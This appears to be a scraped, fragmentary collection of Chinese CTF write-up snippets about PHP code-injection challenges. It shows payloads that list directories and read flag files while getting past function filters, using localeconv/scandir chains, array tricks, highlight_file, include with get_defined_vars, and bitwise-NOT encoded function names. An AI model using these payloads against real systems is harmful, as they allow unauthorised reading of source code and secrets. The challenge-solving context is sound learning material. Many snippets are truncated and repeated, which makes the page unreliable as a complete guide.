exp=pprint_r(array_rand(array_flip(scandir(pos(localeconv())); 由上图可以看出,通过array_rand()能够随机出flag.php文件,然后利用readfile()函数,读取该文件: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 http://127.0.0.1/ctf/web/web-5/index.php?exp=readfile(array_rand(array_flip(scandir...
(__FILE__)当时拿到代码后没多想,直接POST一个参数,执行命令了就,然后看到hint里面是进行了套娃,payload:show_source(next(array_reverse(scandir(pos(localeconv()));,然后就分析了下,按照这个思路的话,具体就是一开始先查看当前文件夹下的文件,执行print_r(scandir(dirname(__FILE__)));,能够看到所有...
步骤:1)获取文件名;2)根据文件名读取其内容 关键函数 scandir() scandir() 函数用于遍历并获取目录, . 表示当前目录 .. 表示上级目录 ?c=scand(.);//遍历当前目录,结果为 . .. flag.php index.php 但. 被屏蔽,我们需要找替代品,而 localeconv() 函数第一个值就为 . 但localeconv() 是数组,我们又只...
当时拿到代码后没多想,直接POST一个参数,执行命令了就,然后看到hint里面是进行了套娃,payload:show_source(next(array_reverse(scandir(pos(localeconv()));,然后就分析了下,按照这个思路的话,具体就是一开始先查看当前文件夹下的文件,执行print_r(scandir(dirname(__FILE__)));,能够看到所有文件然后就想办法读取...
这里使用 scandir() 函数对根目录进行扫描,使用 file_get_contents() 函数获取指定文件内容,并使用 var_dump() 输出前述两个函数返回的结果。因此只需通过 POST 方法分别传入以下 payload 即可在调试界面获得 flag,之所以要在调试界面查看是因为字体默认为黑色,而本站背景就是黑色,因此看不出来。
过滤了很多常用的执行系统命令的函数,先尝试读取系统目录,可以使用scandir函数 AI检测代码解析 print_r(scandir('./')); print_r #%8F%8D%96%91%8B%A0%8D (~%8F%8D%96%91%8B%A0%8D)(); scandir #%8C%9C%9E%91%9B%96%8D (~%8C%9C%9E%91%9B%96%8D)(('./')); ...
可以使用print_r(scandir(目录))形式输出 可以属于 print_r(file_get_content(文件)) 输出文件 file_get_content(文件) <==> cat 文件 整体来看是这样: eval(print_r(scandir(目录))) eg:(结合特定漏洞) http://node4.buuoj.cn:28562/calc.php?%20num=print(scandir(chr(47))); ...
首先题目出题人用了他工地英语(开个玩笑)提示了我们flag在上层目录下的index.php,那我们就需要读取上层目录下的index.php的源码,我们知道scandir()函数式能够读取源码,但是他必须带有参数('.')也就是scandir('.'),在不断阅读函数中我发现uniqid()函数能够生成动态的字符串,但是他前半部分是固定不变的,但是后半...
首先print_r(scandir(dirname(__FILE__)));查看当前目录下文件 然后找到flag.php print_r(next(array_reverse(scandir(dirname(__FILE__))); 之后高亮显示即可 c=highlight_file(next(array_reverse(scandir(dirname(__FILE__))); web32 小知识
使用c=include('flag.php');echo $flag;,$没被ban就能用变量 文件被包含,即被注册(定义),可输出所有一定义的变量查看它们的变量名和值,如 c=include('flag.php');var_dump(get_defined_vars()); 如果flag不在默认目录/var/www/html就需要考虑路径问题 使用c=var_dump(scandir('/'))查看根目录...